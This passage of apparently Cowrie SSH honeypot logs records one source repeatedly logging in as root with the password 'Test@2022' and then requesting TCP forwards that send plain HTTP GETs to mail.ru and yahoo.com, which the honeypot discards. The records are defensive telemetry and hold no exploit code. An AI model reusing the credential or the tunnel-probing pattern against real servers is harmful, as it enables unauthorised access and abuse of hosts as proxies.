.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:24.849781Z","src_ip":"77.83.207.83","session":"d420bf1242e7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:25.098495Z","src_ip":"77.83.207.83","session":"d420bf1242e7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":9452,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:9452","sensor":"my-vps","timestamp":"2025-08-31T03:45:25.148949Z","session":"d420bf1242e7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:25.198644Z","src_ip":"77.83.207.83","session":"d420bf1242e7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":2076,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:2076","sensor":"my-vps","timestamp":"2025-08-31T03:45:25.339910Z","session":"d420bf1242e7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:25.389855Z","src_ip":"77.83.207.83","session":"d420bf1242e7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":30763,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:30763","sensor":"my-vps","timestamp":"2025-08-31T03:45:25.532113Z","session":"d420bf1242e7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:25.581821Z","src_ip":"77.83.207.83","session":"d420bf1242e7"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:25.632306Z","src_ip":"77.83.207.83","session":"d420bf1242e7"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":48861,"dst_ip":"1.2.3.4","dst_port":22,"session":"404593e0f429","protocol":"ssh","message":"New connection: 77.83.207.83:48861 (1.2.3.4:22) [session: 404593e0f429]","sensor":"my-vps","timestamp":"2025-08-31T03:45:25.681372Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:25.682317Z","src_ip":"77.83.207.83","session":"404593e0f429"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:25.732451Z","src_ip":"77.83.207.83","session":"404593e0f429"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:25.981362Z","src_ip":"77.83.207.83","session":"404593e0f429"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:26.017700Z","src_ip":"34.14.223.46","session":"c2a2c6b62672"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":27510,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:27510","sensor":"my-vps","timestamp":"2025-08-31T03:45:26.032414Z","session":"404593e0f429"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:26.082339Z","src_ip":"77.83.207.83","session":"404593e0f429"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":10865,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:10865","sensor":"my-vps","timestamp":"2025-08-31T03:45:26.224432Z","session":"404593e0f429"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:26.274409Z","src_ip":"77.83.207.83","session":"404593e0f429"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":31252,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:31252","sensor":"my-vps","timestamp":"2025-08-31T03:45:26.416339Z","session":"404593e0f429"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:26.466728Z","src_ip":"77.83.207.83","session":"404593e0f429"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:26.517862Z","src_ip":"77.83.207.83","session":"404593e0f429"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":48948,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3720e68cc16","protocol":"ssh","message":"New connection: 77.83.207.83:48948 (1.2.3.4:22) [session: b3720e68cc16]","sensor":"my-vps","timestamp":"2025-08-31T03:45:26.567518Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:26.568358Z","src_ip":"77.83.207.83","session":"b3720e68cc16"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:26.618881Z","src_ip":"77.83.207.83","session":"b3720e68cc16"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:26.875382Z","src_ip":"77.83.207.83","session":"b3720e68cc16"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":26241,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:26241","sensor":"my-vps","timestamp":"2025-08-31T03:45:26.927032Z","session":"b3720e68cc16"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:26.978033Z","src_ip":"77.83.207.83","session":"b3720e68cc16"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":6131,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:6131","sensor":"my-vps","timestamp":"2025-08-31T03:45:27.121014Z","session":"b3720e68cc16"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:27.171919Z","src_ip":"77.83.207.83","session":"b3720e68cc16"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":11337,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:11337","sensor":"my-vps","timestamp":"2025-08-31T03:45:27.316776Z","session":"b3720e68cc16"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:27.367138Z","src_ip":"77.83.207.83","session":"b3720e68cc16"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:27.418440Z","src_ip":"77.83.207.83","session":"b3720e68cc16"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":49045,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c75b47a6f90","protocol":"ssh","message":"New connection: 77.83.207.83:49045 (1.2.3.4:22) [session: 3c75b47a6f90]","sensor":"my-vps","timestamp":"2025-08-31T03:45:27.466706Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:27.467666Z","src_ip":"77.83.207.83","session":"3c75b47a6f90"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:27.518306Z","src_ip":"77.83.207.83","session":"3c75b47a6f90"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:27.765476Z","src_ip":"77.83.207.83","session":"3c75b47a6f90"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":8602,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:8602","sensor":"my-vps","timestamp":"2025-08-31T03:45:27.815937Z","session":"3c75b47a6f90"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:27.865539Z","src_ip":"77.83.207.83","session":"3c75b47a6f90"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":697,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:697","sensor":"my-vps","timestamp":"2025-08-31T03:45:28.008026Z","session":"3c75b47a6f90"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:28.058011Z","src_ip":"77.83.207.83","session":"3c75b47a6f90"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":19605,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:19605","sensor":"my-vps","timestamp":"2025-08-31T03:45:28.200053Z","session":"3c75b47a6f90"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:28.250586Z","src_ip":"77.83.207.83","session":"3c75b47a6f90"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:28.301218Z","src_ip":"77.83.207.83","session":"3c75b47a6f90"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":49115,"dst_ip":"1.2.3.4","dst_port":22,"session":"48e893737464","protocol":"ssh","message":"New connection: 77.83.207.83:49115 (1.2.3.4:22) [session: 48e893737464]","sensor":"my-vps","timestamp":"2025-08-31T03:45:28.350026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:28.350682Z","src_ip":"77.83.207.83","session":"48e893737464"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:28.400478Z","src_ip":"77.83.207.83","session":"48e893737464"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:28.647680Z","src_ip":"77.83.207.83","session":"48e893737464"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":31701,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:31701","sensor":"my-vps","timestamp":"2025-08-31T03:45:28.698266Z","session":"48e893737464"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:28.748676Z","src_ip":"77.83.207.83","session":"48e893737464"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":27685,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:27685","sensor":"my-vps","timestamp":"2025-08-31T03:45:28.888004Z","session":"48e893737464"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:28.937783Z","src_ip":"77.83.207.83","session":"48e893737464"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":16137,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:16137","sensor":"my-vps","timestamp":"2025-08-31T03:45:29.080050Z","session":"48e893737464"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:29.129875Z","src_ip":"77.83.207.83","session":"48e893737464"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:29.180502Z","src_ip":"77.83.207.83","session":"48e893737464"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":49194,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1e272510b3f","protocol":"ssh","message":"New connection: 77.83.207.83:49194 (1.2.3.4:22) [session: f1e272510b3f]","sensor":"my-vps","timestamp":"2025-08-31T03:45:29.229935Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:29.230897Z","src_ip":"77.83.207.83","session":"f1e272510b3f"}
